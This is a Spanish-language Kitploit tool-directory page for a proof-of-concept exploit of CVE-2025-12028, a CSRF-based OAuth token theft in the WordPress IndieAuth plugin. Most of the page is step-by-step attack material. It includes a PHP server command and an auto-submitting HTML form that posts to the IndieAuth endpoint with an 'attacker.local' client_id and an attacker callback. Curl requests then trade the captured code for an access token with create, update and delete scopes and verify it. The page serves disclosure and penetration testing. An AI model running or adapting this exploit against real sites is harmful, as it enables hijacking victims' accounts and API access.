Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-12028 — Prueba de concepto del exploit para CVE-2025-12028 que demuestra el robo de tokens OAuth basado en CSRF en el plugin IndieAuth de WordPress, permitiendo acceso no autorizado a la API con credenciales robadas. | Kitploit
Herramientas/GitHubGitHub/jfriedli/cve-2025-12028
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAutenticación
GitHubjfriedli/cve-2025-12028

CVE-2025-12028

Prueba de concepto del exploit para CVE-2025-12028 que demuestra el robo de tokens OAuth basado en CSRF en el plugin IndieAuth de WordPress, permitiendo acceso no autorizado a la API con credenciales robadas.

Ver Repositorio
1hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

1) Inicie un servidor HTTP simple para alojar la página de prueba de concepto

root@kitploit:~
mkdir -p /tmp/attacker && cd /tmp/attacker
php -S 127.0.0.1:8000

2) Cree un archivo /tmp/attacker/poc.html con el siguiente contenido

root@kitploit:~
<!doctype html>
<html>
  <body>
    <form id="x" method="post" action="http://localhost/wordpress/wp-login.php?action=indieauth">
      <input name="client_id" value="http://attacker.local/app">
      <input name="redirect_uri" value="http://127.0.0.1:8000/cb">
      <input name="state" value="csrf-12345">
      <input name="response_type" value="code">
      <input name="scope[]" value="create">
      <input name="scope[]" value="update">
      <input name="scope[]" value="delete">
    </form>
    <script>
      document.getElementById('x').submit();
    </script>
  </body>
</html>

3) Dispare el PoC en una sesión de navegador autenticada

Mientras tenga la sesión iniciada en:

root@kitploit:~
http://localhost/wordpress

Abra:

root@kitploit:~
http://127.0.0.1:8000/poc.html

en la misma sesión de navegador.


4) Observe la redirección de autorización

El navegador:

  • Enviará una solicitud POST al endpoint de IndieAuth con las cookies de la víctima
  • Recibirá un código de autorización
  • Se redirigirá a:
root@kitploit:~
http://127.0.0.1:8000/cb?code=...&state=csrf-12345

5) Intercambie el código por un token de acceso

root@kitploit:~
curl -sX POST "http://localhost/wordpress/wp-json/indieauth/1.0/token" \
  -d "grant_type=authorization_code" \
  -d "code=PASTE_CODE_FROM_STEP_4" \
  -d "client_id=http://attacker.local/app" \
  -d "redirect_uri=http://127.0.0.1:8000/cb"

6) Observe la respuesta del token

La respuesta JSON contendrá campos como:

  • access_token
  • scope
  • me
  • (posiblemente) refresh_token

Este token ahora puede utilizarse para actuar como la víctima dentro de los scopes concedidos.


7) Verifique el token

root@kitploit:~
TOKEN="PASTE_ACCESS_TOKEN"

curl -s "http://localhost/wordpress/wp-json/indieauth/1.0/token" \
  -H "Authorization: Bearer $TOKEN"
Descargar herramienta